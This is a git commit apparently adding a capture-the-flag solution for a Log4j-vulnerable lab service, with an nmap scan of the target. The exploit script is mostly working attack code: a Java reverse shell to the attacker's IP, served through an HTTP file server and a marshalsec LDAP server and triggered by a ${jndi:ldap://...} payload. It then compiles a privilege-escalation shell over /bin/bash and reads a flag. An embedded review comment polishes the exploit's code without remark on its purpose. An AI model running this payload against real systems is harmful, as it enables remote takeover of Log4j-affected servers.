
Day 19 added

Roman Hergenreder 4 months ago
parent
commit
d80372c8ff
4 changed files with 228 additions and 0 deletions
  1. 1 0
      Day 19/.gitattributes
  2. 173 0
      Day 19/exploit.py
  3. 51 0
      Day 19/machine
  4. 3 0
      Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar

+ 1 - 0
Day 19/.gitattributes

@@ -0,0 +1 @@
+marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text

+ 173 - 0
Day 19/exploit.py

@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import io
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+import signal
+import threading
+
+IP_ADDRESS = util.get_address()
+BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
+
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+    
+    if "allow_redirects" not in kwargs:
+        kwargs["allow_redirects"] = False
+    
+    if "verify" not in kwargs:
+        kwargs["verify"] = False
+
+    if "proxies" not in kwargs:
+        kwargs["proxies"] = PROXIES
+    
+    url = BASE_URL + uri
+    return client.request(method, url, **kwargs)
+
+def compile_java(shell_port):
+    java_code = f"""
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {{
+
+    public Exploit() throws Exception {{
+        String host = "{IP_ADDRESS}";
+        int port = {shell_port};
+        String cmd = "/bin/sh";
+        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+        Socket s = new Socket(host,port);
+        InputStream pi=p.getInputStream(),
+            pe = p.getErrorStream(),
+            si = s.getInputStream();
+        OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+        while (!s.isClosed()) {{
+            while (pi.available() > 0)
+                so.write(pi.read());
+            while (pe.available() > 0)
+                so.write(pe.read());
+            while (si.available() > 0)
+                po.write(si.read());
+            so.flush();
+            po.flush();
+            Thread.sleep(50);
+            try {{
+                p.exitValue();
+                break;
+            }} catch (Exception e) {{
+            }}
+        }}
+        p.destroy();
+        s.close();
+    }}
+}}
+"""
+
+    with open("Exploit.java", "w") as f:
+        f.write(java_code)
+    
+    subprocess.run(["javac", "Exploit.java"])
+    with open("Exploit.class", "rb") as f:
+        java_class = f.read()
+    
+    os.remove("Exploit.java")
+    os.remove("Exploit.class")
+    return java_class
+
+def send_message(msg):
+    json_data = { "name": "", "message": msg }
+    res = request("POST", "/up/sendmessage", json=json_data)
+    util.assert_status_code(res, 200)
+
+def get_privesc_code():
+    c_code = b"""#include <stdio.h>
+#include <unistd.h>
+int main() {
+    printf(\"Spawning a shell with -p parameter...\");
+    char *shell = \"/bin/sh\"; 
+    char *args[] = {shell, \"-p\", NULL};
+    execve(shell, args, NULL);
+    return 0; 
+}
+"""
+
+    return base64.b64encode(c_code).decode()
+
+if __name__ == "__main__":
+
+    http_Port = 8000
+    shell_port = 9001
+    java_payload = compile_java(shell_port)
+    file_server = HttpFileServer("0.0.0.0", http_Port)
+    file_server.addFile("Exploit.class", java_payload)
+    file_server.enableLogging()
+    file_server.startBackground()
+
+    payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}"
+    payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS)
+    ldap_process = None
+
+    def spawn_ldap_server():
+        global ldap_process
+        ldap_process = subprocess.Popen([
+            "java",
+            "-cp",
+            os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"),
+            "marshalsec.jndi.LDAPRefServer",
+            payload_url
+        ])
+        ldap_process.wait()
+
+    print("[ ] Starting LDAP Server")
+    ldap_thread = threading.Thread(target=spawn_ldap_server)
+    ldap_thread.start()
+
+    print("[ ] Triggering log4j shell")
+    shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port)
+    shell.os = "unix"
+    print("[+] Got shell!")
+
+    privesc = get_privesc_code()
+    commands = [
+        f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash",
+        "/santas-workshop/tool",
+        "s",
+        "cat /home/santa/flag.txt",
+        "exit"
+    ]
+    for cmd in commands:
+        shell.sendline(cmd)
+        time.sleep(0.5)
+
+    print("[+] Flag:", shell.raw_output.decode())
+    shell.close()
+
+    print("[ ] Stopping listeners...")
+    file_server.stop()
+    ldap_process.send_signal(signal.SIGINT)
+    ldap_thread.join()
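Review bot: In `compile_java`, the `javac` return code is never checked, so a failed compile leaves `Exploit.java` on disk and the following `open("Exploit.class", "rb")` fails with an unrelated FileNotFoundError instead of the compiler error. Passing `subprocess.run(["javac", "Exploit.java"], check=True)` surfaces the real failure, and moving the two `os.remove` calls into a `finally:` block keeps the working directory clean on either path. The names `http_Port` and `shell_port` in the `__main__` block also mix capitalisation; `http_port` would match the rest of the file. A short module docstring stating what the script assumes about the environment (a `javac` on PATH and the `marshalsec` jar in the current directory, both visible from the `subprocess` calls) would help a reader who only sees this file.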

+ 51 - 0
Day 19/machine

@@ -0,0 +1,51 @@
+Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land
+
+PORT      STATE    SERVICE    VERSION
+22/tcp    filtered ssh
+80/tcp    open     http Jetty 9.4.26v20200117
+|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/
+111/tcp   open     rpcbind    2-4 (RPC #100000)
+| rpcinfo: 
+|   program version    port/proto  service
+|   100000  2,3,4        111/tcp   rpcbind
+|   100000  2,3,4        111/udp   rpcbind
+|   100000  3,4          111/tcp6  rpcbind
+|_  100000  3,4          111/udp6  rpcbind
+443/tcp   open     ssl/http   Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
+| ssl-cert: Subject: commonName=*.idocker.vuln.land
+| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land
+| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
+| Public Key type: rsa
+| Public Key bits: 3072
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-09-04T00:00:00
+| Not valid after:  2024-09-08T23:59:59
+| MD5:   80d7:8bfe:9544:857d:d5ab:3419:4283:4228
+|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: Jetty(9.4.26.v20200117)
+|_http-title: Minecraft Dynamic Map
+| http-robots.txt: 5 disallowed entries 
+|_/tiles/ /js/ /standalone/ /images/ /css/
+8080/tcp  open     http-proxy
+| fingerprint-strings: 
+|   FourOhFourRequest, GetRequest, HTTPOptions: 
+|     HTTP/1.0 401 Unauthorized
+|     Content-Type: text/plain
+|     Www-Authenticate: Basic realm="traefik"
+|     Date: Mon, 18 Dec 2023 23:25:56 GMT
+|     Content-Length: 17
+|     Unauthorized
+|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
+|     HTTP/1.1 400 Bad Request
+|     Content-Type: text/plain; charset=utf-8
+|     Connection: close
+|_    Request
+|_http-title: Site doesn't have a title (text/plain).
+| http-auth: 
+| HTTP/1.1 401 Unauthorized\x0D
+|_  Basic realm=traefik
+9100/tcp  open     jetdirect?
+42810/tcp open     fmproduct  1-4 (RPC #1073741824)
+55555/tcp open     http       Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

+ 3 - 0
Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7
+size 42565306